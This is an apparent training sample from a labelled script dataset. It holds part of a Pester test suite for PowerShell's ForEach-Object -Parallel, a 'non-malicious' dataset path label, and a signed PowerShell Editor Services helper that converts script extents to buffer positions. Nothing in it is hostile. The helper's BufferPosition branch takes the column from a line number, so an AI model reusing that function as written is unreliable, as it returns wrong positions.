-Parallel { if ($_ -eq 1) { throw 'Terminating Error!' "Hello!" } else { "Goodbye!" } } 2>&1 $resultStrings = $results | ForEach-Object { $_.ToString() } $resultStrings | Should -Not -Contain "Hello!" $resultStrings | Should -Contain "Goodbye!" $resultStrings | Should -Contain "Terminating Error!" } It 'Verifies non-terminating error streaming' { $actualError = 1..1 | ForEach-Object -Parallel { Write-Error "Error!" } 2>&1 $actualError.ToString() | Should -BeExactly 'Error!' $actualError.FullyQualifiedErrorId | Should -BeExactly 'Microsoft.PowerShell.Commands.WriteErrorException' } It 'Verifies warning data streaming' { $actualWarning = 1..1 | ForEach-Object -Parallel { Write-Warning "Warning!" } 3>&1 $actualWarning.Message | Should -BeExactly 'Warning!' } It 'Verifies verbose data streaming' { $actualVerbose = 1..1 | ForEach-Object -Parallel { Write-Verbose "Verbose!" -Verbose } -Verbose 4>&1 $actualVerbose.Message | Should -BeExactly 'Verbose!' } It 'Verifies debug data streaming' { $actualDebug = 1..1 | ForEach-Object -Parallel { Write-Debug "Debug!" -Debug } -Debug 5>&1 $actualDebug.Message | Should -BeExactly 'Debug!' } It 'Verifies information data streaming' { $actualInformation = 1..1 | ForEach-Object -Parallel { Write-Information "Information!" } 6>&1 $actualInformation.MessageData | Should -BeExactly 'Information!' } It 'Verifies error for using script block variable' { { 1..1 | ForEach-Object -Parallel { $using:sb } } | Should -Throw -ErrorId 'ParallelUsingVariableCannotBeScriptBlock,Microsoft.PowerShell.Commands.ForEachObjectCommand' } It 'Verifies error for script block piped variable' { $actualError = $sb | ForEach-Object -Parallel { "Hello" } 2>&1 $actualError.FullyQualifiedErrorId | Should -BeExactly 'ParallelPipedInputObjectCannotBeScriptBlock,Microsoft.PowerShell.Commands.ForEachObjectCommand' } It 'Verifies that parallel script blocks run in FullLanguage mode by default' { $results = 1..1 | ForEach-Object -Parallel { $ExecutionContext.SessionState.LanguageMode } $results | Should -BeExactly 'FullLanguage' } It 'Verifies that the current working directory is preserved' { $parallelScriptLocation = 1..1 | ForEach-Object -Parallel { $pwd } $parallelScriptLocation.Path | Should -BeExactly $pwd.Path } } Describe 'ForEach-Object -Parallel common parameters' -Tags 'CI' { BeforeAll { $skipTest = -not $EnabledExperimentalFeatures.Contains('PSForEachObjectParallel') if ($skipTest) { Write-Verbose "Test Suite Skipped. The test suite requires the experimental feature 'PSForEachObjectParallel' to be enabled." -Verbose $originalDefaultParameterValues = $PSDefaultParameterValues.Clone() $PSDefaultParameterValues["it:skip"] = $true } $TestCasesNotSupportedCommonParameters = @( @{ testName = 'Verifies that ErrorAction common parameter is not supported' scriptBlock = { 1..1 | ForEach-Object -Parallel { "Hello" } -ErrorAction Stop } }, @{ testName = 'Verifies that WarningAction common parameter is not supported' scriptBlock = { 1..1 | ForEach-Object -Parallel { "Hello" } -WarningAction SilentlyContinue } }, @{ testName = 'Verifies that InformationAction common parameter is not supported' scriptBlock = { 1..1 | ForEach-Object -Parallel { "Hello" } -InformationAction SilentlyContinue } }, @{ testName = 'Verifies that PipelineVariable common parameter is not supported' scriptBlock = { 1..1 | ForEach-Object -Parallel { "Hello" } -PipelineVariable pipeVar } } ) $TestCasesForSupportedCommonParameters = @( @{ testName = 'Verifies ErrorVariable common parameter' scriptBlock = { 1..1 | ForEach-Object -Parallel { Write-Error "Error:$_" } -ErrorVariable global:actualVariable } expectedResult = 'Error:1' }, @{ testName = 'Verifies WarningVarible common parameter' scriptBlock = { 1..1 | ForEach-Object -Parallel { Write-Warning "Warning:$_" } -WarningVariable global:actualVariable } expectedResult = 'Warning:1' }, @{ testName = 'Verifies InformationVariable common parameter' scriptBlock = { 1..1 | ForEach-Object -Parallel { Write-Information "Information:$_" } -InformationVariable global:actualVariable } expectedResult = 'Information:1' }, @{ testName = 'Verifies OutVariable common parameter' scriptBlock = { 1..1 | ForEach-Object -Parallel { Write-Output "Output:$_" } -OutVariable global:actualVariable } expectedResult = 'Output:1' } ) } BeforeEach { $global:actualVariable = $null } AfterAll { if ($skipTest) { $global:PSDefaultParameterValues = $originalDefaultParameterValues } $global:actualVariable = $null } It "<testName>" -TestCases $TestCasesNotSupportedCommonParameters { param ($scriptBlock) { & $scriptBlock } | Should -Throw -ErrorId 'ParallelCommonParametersNotSupported,Microsoft.PowerShell.Commands.ForEachObjectCommand' } It "<testName>" -TestCases $TestCasesForSupportedCommonParameters { param ($scriptBlock, $expectedResult) & $scriptBlock *>$null $global:actualVariable[0].ToString() | Should -BeExactly $expectedResult } } Describe 'ForEach-Object -Parallel -AsJob Basic Tests' -Tags 'CI' { BeforeAll { $skipTest = -not $EnabledExperimentalFeatures.Contains('PSForEachObjectParallel') if ($skipTest) { Write-Verbose "Test Suite Skipped. The test suite requires the experimental feature 'PSForEachObjectParallel' to be enabled." -Verbose $originalDefaultParameterValues = $PSDefaultParameterValues.Clone() $PSDefaultParameterValues["it:skip"] = $true } } AfterAll { if ($skipTest) { $global:PSDefaultParameterValues = $originalDefaultParameterValues } } It 'Verifies TimeoutSeconds parameter is excluded from AsJob' { { 1..1 | ForEach-Object -AsJob -Parallel { "Hello" } -TimeoutSeconds 60 } | Should -Throw -ErrorId 'ParallelCannotUseTimeoutWithJob,Microsoft.PowerShell.Commands.ForEachObjectCommand' } It 'Verifies ForEach-Object -Parallel jobs appear in job repository' { $job = 1..1 | ForEach-Object -AsJob -Parallel { "Hello" } Get-Job | Should -Contain $job $job | Wait-Job | Remove-Job } It 'Verifies dollar underbar variable' { $expected = 1..10 $job = $expected | ForEach-Object -AsJob -Parallel { $_ } $result = $job | Wait-Job | Receive-Job $job | Remove-Job $result.Count | Should -BeExactly $expected.Count $result | Should -Contain 1 $result | Should -Contain 10 } It 'Verifies using variables' { $Var1 = "Hello" $Var2 = "Goodbye" $Var3 = 105 $Var4 = "One","Two","Three" $job = 1..1 | Foreach-Object -AsJob -Parallel { Write-Output $using:Var1 Write-Output $using:Var2 Write-Output $using:Var3 Write-Output @(,$using:Var4) Write-Output $using:Var4[1] } $results = $job | Wait-Job | Receive-Job $job | Remove-Job $results[0] | Should -BeExactly $Var1 $results[1] | Should -BeExactly $Var2 $results[2] | Should -BeExactly $Var3 $results[3] | Should -BeExactly $Var4 $results[4] | Should -BeExactly $Var4[1] } It 'Verifies terminating error in single iteration' { $job = 1..1 | ForEach-Object -AsJob -Parallel { throw "Terminating Error!"; "Hello" } $results = $job | Wait-Job | Receive-Job 2>$null $results.Count | Should -BeExactly 0 $job.State | Should -BeExactly 'Failed' $job.ChildJobs[0].JobStateInfo.State | Should -BeExactly 'Failed' $job.ChildJobs[0].JobStateInfo.Reason.Message | Should -BeExactly 'Terminating Error!' $job | Remove-Job } It 'Verifies terminating error in double iteration' { $job = 1..2 | ForEach-Object -AsJob -Parallel { if ($_ -eq 1) { throw "Terminating Error!" "Goodbye!" } else { "Hello!" } } $results = $job | Wait-Job | Receive-Job 2>$null $results | Should -Contain 'Hello!' $results | Should -Not -Contain 'Goodbye!' $job.JobStateInfo.State | Should -BeExactly 'Failed' $job.ChildJobs[0].JobStateInfo.State | Should -BeExactly 'Failed' $job.ChildJobs[0].JobStateInfo.Reason.Message | Should -BeExactly 'Terminating Error!' $job.ChildJobs[1].JobStateInfo.State | Should -BeExactly 'Completed' $job | Remove-Job } It 'Verifies non-terminating error' { $job = 1..1 | ForEach-Object -AsJob -Parallel { Write-Error "Error:$_" } $results = $job | Wait-Job | Receive-Job 2>&1 $job | Remove-Job $results.ToString() | Should -BeExactly "Error:1" } It 'Verifies warning data' { $job = 1..1 | ForEach-Object -AsJob -Parallel { Write-Warning "Warning:$_" } $results = $job | Wait-Job | Receive-Job 3>&1 $job | Remove-Job $results.Message | Should -BeExactly "Warning:1" } It 'Verifies verbose data' { $job = 1..1 | ForEach-Object -AsJob -Parallel { Write-Verbose "Verbose:$_" -Verbose } $results = $job | Wait-Job | Receive-Job -Verbose 4>&1 $job | Remove-Job $results.Message | Should -BeExactly "Verbose:1" } It 'Verifies debug data' { $job = 1..1 | ForEach-Object -AsJob -Parallel { Write-Debug "Debug:$_" -Debug } $results = $job | Wait-Job | Receive-Job -Debug 5>&1 $job | Remove-Job $results.Message | Should -BeExactly "Debug:1" } It 'Verifies information data' { $job = 1..1 | ForEach-Object -AsJob -Parallel { Write-Information "Information:$_" } $results = $job | Wait-Job | Receive-Job 6>&1 $job | Remove-Job $results.MessageData | Should -BeExactly "Information:1" } It 'Verifies job Command property' { $job = 1..1 | ForEach-Object -AsJob -Parallel {"Hello"} $job.Command | Should -BeExactly '"Hello"' $job.ChildJobs[0].Command | Should -BeExactly '"Hello"' $job | Wait-Job | Remove-Job } It 'Verifies that the current working directory is preserved' { $job = 1..1 | ForEach-Object -AsJob -Parallel { $pwd } $parallelScriptLocation = $job | Wait-Job | Receive-Job $job | Remove-Job $parallelScriptLocation.Path | Should -BeExactly $pwd.Path } } Describe 'ForEach-Object -Parallel Functional Tests' -Tags 'Feature' { BeforeAll { $skipTest = -not $EnabledExperimentalFeatures.Contains('PSForEachObjectParallel') if ($skipTest) { Write-Verbose "Test Suite Skipped. The test suite requires the experimental feature 'PSForEachObjectParallel' to be enabled." -Verbose $originalDefaultParameterValues = $PSDefaultParameterValues.Clone() $PSDefaultParameterValues["it:skip"] = $true } } AfterAll { if ($skipTest) { $global:PSDefaultParameterValues = $originalDefaultParameterValues } } It 'Verifies job queuing and throttle limit' { $job = 1..4 | ForEach-Object -Parallel { Start-Sleep 60 } -AsJob -ThrottleLimit 2 if ( !(Wait-UntilTrue -TimeoutInMilliseconds 10000 -IntervalInMilliseconds 250 ` { $job.ChildJobs[1].JobStateInfo.State -eq 'Running' })) { throw "ForEach-Object -Parallel child job 2 did not start" } $job.ChildJobs[0].JobStateInfo.State | Should -BeExactly 'Running' $job.ChildJobs[1].JobStateInfo.State | Should -BeExactly 'Running' $job.ChildJobs[2].JobStateInfo.State | Should -BeExactly 'NotStarted' $job.ChildJobs[3].JobStateInfo.State | Should -BeExactly 'NotStarted' $job | Remove-Job -Force } It 'Verifies jobs work with Receive-Job -AutoRemove parameter' { $job = 1..4 | ForEach-Object -AsJob -Parallel { "Hello:$_" } $null = $job | Receive-Job -Wait -AutoRemoveJob Get-Job | Should -Not -Contain $job } It 'Verifies parallel task queuing' { $results = 10..1 | ForEach-Object -Parallel { Start-Sleep 1; $_ } -ThrottleLimit 5 $results[0] | Should -BeGreaterThan 5 $results[1] | Should -BeGreaterThan 5 $results[2] | Should -BeGreaterThan 5 $results[3] | Should -BeGreaterThan 5 $results[4] | Should -BeGreaterThan 5 } It 'Verifies timeout and throttle parameters' { $results = 1..2 | ForEach-Object -Parallel { "Output $_"; Start-Sleep -Seconds 60 } -TimeoutSeconds 5 -ThrottleLimit 1 2>&1 $results.Count | Should -BeExactly 2 $results[0] | Should -BeExactly 'Output 1' $results[1].FullyQualifiedErrorId | Should -BeExactly 'PSTaskException' $results[1].Exception | Should -BeOfType [System.Management.Automation.PipelineStoppedException] } }
combined_dataset/train/non-malicious/sample_10_58.ps1
sample_10_58.ps1
# Copyright (c) Microsoft Corporation. # Licensed under the MIT License. function ConvertFrom-ScriptExtent { <# .EXTERNALHELP ..\PowerShellEditorServices.Commands-help.xml #> [CmdletBinding()] [OutputType([Microsoft.PowerShell.EditorServices.Extensions.IFileRange, Microsoft.PowerShell.EditorServices], ParameterSetName='BufferRange')] [OutputType([Microsoft.PowerShell.EditorServices.Extensions.IFilePosition, Microsoft.PowerShell.EditorServices], ParameterSetName='BufferPosition')] param( [Parameter(Mandatory, ValueFromPipeline, ValueFromPipelineByPropertyName)] [ValidateNotNullOrEmpty()] [System.Management.Automation.Language.IScriptExtent[]] $Extent, [Parameter(ParameterSetName='BufferRange')] [switch] $BufferRange, [Parameter(ParameterSetName='BufferPosition')] [switch] $BufferPosition, [Parameter(ParameterSetName='BufferPosition')] [switch] $Start, [Parameter(ParameterSetName='BufferPosition')] [switch] $End ) process { foreach ($aExtent in $Extent) { switch ($PSCmdlet.ParameterSetName) { BufferRange { # yield [Microsoft.PowerShell.EditorServices.Extensions.FileRange, Microsoft.PowerShell.EditorServices]::new( $aExtent.StartLineNumber, $aExtent.StartColumnNumber, $aExtent.EndLineNumber, $aExtent.EndColumnNumber) } BufferPosition { if ($End) { $line = $aExtent.EndLineNumber $column = $aExtent.EndLineNumber } else { $line = $aExtent.StartLineNumber $column = $aExtent.StartLineNumber } # yield [Microsoft.PowerShell.EditorServices.Extensions.FileRange, Microsoft.PowerShell.EditorServices]::new( $line, $column) } } } } } # SIG # Begin signature block # MIIoOQYJKoZIhvcNAQcCoIIoKjCCKCYCAQExDzANBglghkgBZQMEAgEFADB5Bgor # BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG # KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCBPKxil1U4JnRPS # QyqUqw0RKxJ6fsZihk0k1ECh3hKbp6CCDYUwggYDMIID66ADAgECAhMzAAADri01 # UchTj1UdAAAAAAOuMA0GCSqGSIb3DQEBCwUAMH4xCzAJBgNVBAYTAlVTMRMwEQYD # VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNpZ25p # bmcgUENBIDIwMTEwHhcNMjMxMTE2MTkwODU5WhcNMjQxMTE0MTkwODU5WjB0MQsw # CQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u # ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMR4wHAYDVQQDExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB # AQD0IPymNjfDEKg+YyE6SjDvJwKW1+pieqTjAY0CnOHZ1Nj5irGjNZPMlQ4HfxXG # yAVCZcEWE4x2sZgam872R1s0+TAelOtbqFmoW4suJHAYoTHhkznNVKpscm5fZ899 # QnReZv5WtWwbD8HAFXbPPStW2JKCqPcZ54Y6wbuWV9bKtKPImqbkMcTejTgEAj82 # 6GQc6/Th66Koka8cUIvz59e/IP04DGrh9wkq2jIFvQ8EDegw1B4KyJTIs76+hmpV # M5SwBZjRs3liOQrierkNVo11WuujB3kBf2CbPoP9MlOyyezqkMIbTRj4OHeKlamd # WaSFhwHLJRIQpfc8sLwOSIBBAgMBAAGjggGCMIIBfjAfBgNVHSUEGDAWBgorBgEE # AYI3TAgBBggrBgEFBQcDAzAdBgNVHQ4EFgQUhx/vdKmXhwc4WiWXbsf0I53h8T8w # VAYDVR0RBE0wS6RJMEcxLTArBgNVBAsTJE1pY3Jvc29mdCBJcmVsYW5kIE9wZXJh # dGlvbnMgTGltaXRlZDEWMBQGA1UEBRMNMjMwMDEyKzUwMTgzNjAfBgNVHSMEGDAW # gBRIbmTlUAXTgqoXNzcitW2oynUClTBUBgNVHR8ETTBLMEmgR6BFhkNodHRwOi8v # d3d3Lm1pY3Jvc29mdC5jb20vcGtpb3BzL2NybC9NaWNDb2RTaWdQQ0EyMDExXzIw # MTEtMDctMDguY3JsMGEGCCsGAQUFBwEBBFUwUzBRBggrBgEFBQcwAoZFaHR0cDov # L3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9jZXJ0cy9NaWNDb2RTaWdQQ0EyMDEx # XzIwMTEtMDctMDguY3J0MAwGA1UdEwEB/wQCMAAwDQYJKoZIhvcNAQELBQADggIB # AGrJYDUS7s8o0yNprGXRXuAnRcHKxSjFmW4wclcUTYsQZkhnbMwthWM6cAYb/h2W # 5GNKtlmj/y/CThe3y/o0EH2h+jwfU/9eJ0fK1ZO/2WD0xi777qU+a7l8KjMPdwjY # 0tk9bYEGEZfYPRHy1AGPQVuZlG4i5ymJDsMrcIcqV8pxzsw/yk/O4y/nlOjHz4oV # APU0br5t9tgD8E08GSDi3I6H57Ftod9w26h0MlQiOr10Xqhr5iPLS7SlQwj8HW37 # ybqsmjQpKhmWul6xiXSNGGm36GarHy4Q1egYlxhlUnk3ZKSr3QtWIo1GGL03hT57 # xzjL25fKiZQX/q+II8nuG5M0Qmjvl6Egltr4hZ3e3FQRzRHfLoNPq3ELpxbWdH8t # Nuj0j/x9Crnfwbki8n57mJKI5JVWRWTSLmbTcDDLkTZlJLg9V1BIJwXGY3i2kR9i # 5HsADL8YlW0gMWVSlKB1eiSlK6LmFi0rVH16dde+j5T/EaQtFz6qngN7d1lvO7uk # 6rtX+MLKG4LDRsQgBTi6sIYiKntMjoYFHMPvI/OMUip5ljtLitVbkFGfagSqmbxK # 7rJMhC8wiTzHanBg1Rrbff1niBbnFbbV4UDmYumjs1FIpFCazk6AADXxoKCo5TsO # zSHqr9gHgGYQC2hMyX9MGLIpowYCURx3L7kUiGbOiMwaMIIHejCCBWKgAwIBAgIK # YQ6Q0gAAAAAAAzANBgkqhkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNV # BAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jv # c29mdCBDb3Jwb3JhdGlvbjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlm # aWNhdGUgQXV0aG9yaXR5IDIwMTEwHhcNMTEwNzA4MjA1OTA5WhcNMjYwNzA4MjEw # OTA5WjB+MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UE # BxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSgwJgYD # VQQDEx9NaWNyb3NvZnQgQ29kZSBTaWduaW5nIFBDQSAyMDExMIICIjANBgkqhkiG # 9w0BAQEFAAOCAg8AMIICCgKCAgEAq/D6chAcLq3YbqqCEE00uvK2WCGfQhsqa+la # UKq4BjgaBEm6f8MMHt03a8YS2AvwOMKZBrDIOdUBFDFC04kNeWSHfpRgJGyvnkmc # 6Whe0t+bU7IKLMOv2akrrnoJr9eWWcpgGgXpZnboMlImEi/nqwhQz7NEt13YxC4D # dato88tt8zpcoRb0RrrgOGSsbmQ1eKagYw8t00CT+OPeBw3VXHmlSSnnDb6gE3e+ # lD3v++MrWhAfTVYoonpy4BI6t0le2O3tQ5GD2Xuye4Yb2T6xjF3oiU+EGvKhL1nk # kDstrjNYxbc+/jLTswM9sbKvkjh+0p2ALPVOVpEhNSXDOW5kf1O6nA+tGSOEy/S6 # A4aN91/w0FK/jJSHvMAhdCVfGCi2zCcoOCWYOUo2z3yxkq4cI6epZuxhH2rhKEmd # X4jiJV3TIUs+UsS1Vz8kA/DRelsv1SPjcF0PUUZ3s/gA4bysAoJf28AVs70b1FVL # 5zmhD+kjSbwYuER8ReTBw3J64HLnJN+/RpnF78IcV9uDjexNSTCnq47f7Fufr/zd # sGbiwZeBe+3W7UvnSSmnEyimp31ngOaKYnhfsi+E11ecXL93KCjx7W3DKI8sj0A3 # T8HhhUSJxAlMxdSlQy90lfdu+HggWCwTXWCVmj5PM4TasIgX3p5O9JawvEagbJjS # 4NaIjAsCAwEAAaOCAe0wggHpMBAGCSsGAQQBgjcVAQQDAgEAMB0GA1UdDgQWBBRI # bmTlUAXTgqoXNzcitW2oynUClTAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTAL # BgNVHQ8EBAMCAYYwDwYDVR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBRyLToCMZBD # uRQFTuHqp8cx0SOJNDBaBgNVHR8EUzBRME+gTaBLhklodHRwOi8vY3JsLm1pY3Jv # c29mdC5jb20vcGtpL2NybC9wcm9kdWN0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFf # MDNfMjIuY3JsMF4GCCsGAQUFBwEBBFIwUDBOBggrBgEFBQcwAoZCaHR0cDovL3d3 # dy5taWNyb3NvZnQuY29tL3BraS9jZXJ0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFf # MDNfMjIuY3J0MIGfBgNVHSAEgZcwgZQwgZEGCSsGAQQBgjcuAzCBgzA/BggrBgEF # BQcCARYzaHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9kb2NzL3ByaW1h # cnljcHMuaHRtMEAGCCsGAQUFBwICMDQeMiAdAEwAZQBnAGEAbABfAHAAbwBsAGkA # YwB5AF8AcwB0AGEAdABlAG0AZQBuAHQALiAdMA0GCSqGSIb3DQEBCwUAA4ICAQBn # 8oalmOBUeRou09h0ZyKbC5YR4WOSmUKWfdJ5DJDBZV8uLD74w3LRbYP+vj/oCso7 # v0epo/Np22O/IjWll11lhJB9i0ZQVdgMknzSGksc8zxCi1LQsP1r4z4HLimb5j0b # pdS1HXeUOeLpZMlEPXh6I/MTfaaQdION9MsmAkYqwooQu6SpBQyb7Wj6aC6VoCo/ # KmtYSWMfCWluWpiW5IP0wI/zRive/DvQvTXvbiWu5a8n7dDd8w6vmSiXmE0OPQvy # CInWH8MyGOLwxS3OW560STkKxgrCxq2u5bLZ2xWIUUVYODJxJxp/sfQn+N4sOiBp # mLJZiWhub6e3dMNABQamASooPoI/E01mC8CzTfXhj38cbxV9Rad25UAqZaPDXVJi # hsMdYzaXht/a8/jyFqGaJ+HNpZfQ7l1jQeNbB5yHPgZ3BtEGsXUfFL5hYbXw3MYb # BL7fQccOKO7eZS/sl/ahXJbYANahRr1Z85elCUtIEJmAH9AAKcWxm6U/RXceNcbS # oqKfenoi+kiVH6v7RyOA9Z74v2u3S5fi63V4GuzqN5l5GEv/1rMjaHXmr/r8i+sL # gOppO6/8MO0ETI7f33VtY5E90Z1WTk+/gFcioXgRMiF670EKsT/7qMykXcGhiJtX # cVZOSEXAQsmbdlsKgEhr/Xmfwb1tbWrJUnMTDXpQzTGCGgowghoGAgEBMIGVMH4x # CzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRt # b25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01p # Y3Jvc29mdCBDb2RlIFNpZ25pbmcgUENBIDIwMTECEzMAAAOuLTVRyFOPVR0AAAAA # A64wDQYJYIZIAWUDBAIBBQCgga4wGQYJKoZIhvcNAQkDMQwGCisGAQQBgjcCAQQw # HAYKKwYBBAGCNwIBCzEOMAwGCisGAQQBgjcCARUwLwYJKoZIhvcNAQkEMSIEIK4/ # 5I8fIFzVsF+1m770kKJ3FjDZS+ZNvbZeAbFH/Nn6MEIGCisGAQQBgjcCAQwxNDAy # oBSAEgBNAGkAYwByAG8AcwBvAGYAdKEagBhodHRwOi8vd3d3Lm1pY3Jvc29mdC5j # b20wDQYJKoZIhvcNAQEBBQAEggEAPjEqhEi/tA3h2TqnT1tkgZNUOD2yLnDmyKW5 # B6XgbNdHfxF4fzL79K3Fu3oCuNa2zT2C8uNf8jRkpZRDXKb1oHon8KcUs/Nx9nHD # 4ynu+NmvwJLXonvpFBMuhB4s2OSWvLwXIbj1tLzn+W8yEl2KoPE2ZpuJJDoiily3 # A3TI6Lctb5DgEFyUZ8nVzv3Q+Ff+2/6mhfLWZ8HpTbiOGKdjHIUjJvktmwtTqduO # MMfhzY7cfEt3vW1cBvkqoJzZrMe8AOzN1ISCwb4hvIRzEqu/cO75MojvmWXhETEo # to4E20SHsmqzqdmHCiNBw467ZqPOfcESzRFiW+3r+4lHk8z1HqGCF5QwgheQBgor # BgEEAYI3AwMBMYIXgDCCF3wGCSqGSIb3DQEHAqCCF20wghdpAgEDMQ8wDQYJYIZI # AWUDBAIBBQAwggFSBgsqhkiG9w0BCRABBKCCAUEEggE9MIIBOQIBAQYKKwYBBAGE # WQoDATAxMA0GCWCGSAFlAwQCAQUABCC0b6WDzAPx4DMWpcvN+xb7J0p0OhzfLVj7 # yhTuGIGW3wIGZZ/Qu1INGBMyMDI0MDEyNjAyMjcwNC43MzhaMASAAgH0oIHRpIHO # MIHLMQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMH # UmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSUwIwYDVQQL # ExxNaWNyb3NvZnQgQW1lcmljYSBPcGVyYXRpb25zMScwJQYDVQQLEx5uU2hpZWxk # IFRTUyBFU046QTQwMC0wNUUwLUQ5NDcxJTAjBgNVBAMTHE1pY3Jvc29mdCBUaW1l # LVN0YW1wIFNlcnZpY2WgghHqMIIHIDCCBQigAwIBAgITMwAAAdYnaf9yLVbIrgAB # AAAB1jANBgkqhkiG9w0BAQsFADB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2Fz # aGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENv # cnBvcmF0aW9uMSYwJAYDVQQDEx1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAx # MDAeFw0yMzA1MjUxOTEyMzRaFw0yNDAyMDExOTEyMzRaMIHLMQswCQYDVQQGEwJV # UzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UE # ChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSUwIwYDVQQLExxNaWNyb3NvZnQgQW1l # cmljYSBPcGVyYXRpb25zMScwJQYDVQQLEx5uU2hpZWxkIFRTUyBFU046QTQwMC0w # NUUwLUQ5NDcxJTAjBgNVBAMTHE1pY3Jvc29mdCBUaW1lLVN0YW1wIFNlcnZpY2Uw # ggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoICAQDPLM2Om8r5u3fcbDEOXydJ # tbkW5U34KFaftC+8QyNqplMIzSTC1ToE0zcweQCvPIfpYtyPB3jt6fPRprvhwCks # Uw9p0OfmZzWPDvkt40BUStu813QlrloRdplLz2xpk29jIOZ4+rBbKaZkBPZ4R4LX # QhkkHne0Y/Yh85ZqMMRaMWkBM6nUwV5aDiwXqdE9Jyl0i1aWYbCqzwBRdN7CTlAJ # xrJ47ov3uf/lFg9hnVQcqQYgRrRFpDNFMOP0gwz5Nj6a24GZncFEGRmKwImL+5KW # PnVgvadJSRp6ZqrYV3FmbBmZtsF0hSlVjLQO8nxelGV7TvqIISIsv2bQMgUBVEz8 # wHFyU3863gHj8BCbEpJzm75fLJsL3P66lJUNRN7CRsfNEbHdX/d6jopVOFwF7omm # TQjpU37A/7YR0wJDTt6ZsXU+j/wYlo9b22t1qUthqjRs32oGf2TRTCoQWLhJe3cA # IYRlla/gEKlbuDDsG3926y4EMHFxTjsjrcZEbDWwjB3wrp11Dyg1QKcDyLUs2anB # olvQwJTN0mMOuXO8tBz20ng/+Xw+4w+W9PMkvW1faYi435VjKRZsHfxIPjIzZ0wf # 4FibmVPJHZ+aTxGsVJPxydChvvGCf4fe8XfYY9P5lbn9ScKc4adTd44GCrBlJ/JO # soA4OvNHY6W+XcKVcIIGWwIDAQABo4IBSTCCAUUwHQYDVR0OBBYEFGGaVDY7TQBi # MCKg2+j/zRTcYsZOMB8GA1UdIwQYMBaAFJ+nFV0AXmJdg/Tl0mWnG1M1GelyMF8G # A1UdHwRYMFYwVKBSoFCGTmh0dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9wa2lvcHMv # Y3JsL01pY3Jvc29mdCUyMFRpbWUtU3RhbXAlMjBQQ0ElMjAyMDEwKDEpLmNybDBs # BggrBgEFBQcBAQRgMF4wXAYIKwYBBQUHMAKGUGh0dHA6Ly93d3cubWljcm9zb2Z0 # LmNvbS9wa2lvcHMvY2VydHMvTWljcm9zb2Z0JTIwVGltZS1TdGFtcCUyMFBDQSUy # MDIwMTAoMSkuY3J0MAwGA1UdEwEB/wQCMAAwFgYDVR0lAQH/BAwwCgYIKwYBBQUH # AwgwDgYDVR0PAQH/BAQDAgeAMA0GCSqGSIb3DQEBCwUAA4ICAQDUv+RjNidwJxSb # Mk1IvS8LfxNM8VaVhpxR1SkW+FRY6AKkn2s3On29nGEVlatblIv1qVTKkrUxLYMZ # 0z+RA6mmfXue2Y7/YBbzM5kUeUgU2y1Mmbin6xadT9DzECeE7E4+3k2DmZxuV+GL # FYQsqkDbe8oy7+3BSiU29qyZAYT9vRDALPUC5ZwyoPkNfKbqjl3VgFTqIubEQr56 # M0YdMWlqCqq0yVln9mPbhHHzXHOjaQsurohHCf7VT8ct79po34Fd8XcsqmyhdKBy # 1jdyknrik+F3vEl/90qaon5N8KTZoGtOFlaJFPnZ2DqQtb2WWkfuAoGWrGSA43My # l7+PYbUsri/NrMvAd9Z+J9FlqsMwXQFxAB7ujJi4hP8BH8j6qkmy4uulU5SSQa6X # kElcaKQYSpJcSjkjyTDIOpf6LZBTaFx6eeoqDZ0lURhiRqO+1yo8uXO89e6kgBeC # 8t1WN5ITqXnjocYgDvyFpptsUDgnRUiI1M/Ql/O299VktMkIL72i6Qd4BBsrj3Z+ # iLEnKP9epUwosP1m3N2v9yhXQ1HiusJl63IfXIyfBJaWvQDgU3Jk4eIZSr/2KIj4 # ptXt496CRiHTi011kcwDpdjQLAQiCvoj1puyhfwVf2G5ZwBptIXivNRba34KkD5o # qmEoF1yRFQ84iDsf/giyn/XIT7YY/zCCB3EwggVZoAMCAQICEzMAAAAVxedrngKb # SZkAAAAAABUwDQYJKoZIhvcNAQELBQAwgYgxCzAJBgNVBAYTAlVTMRMwEQYDVQQI # EwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3Nv # 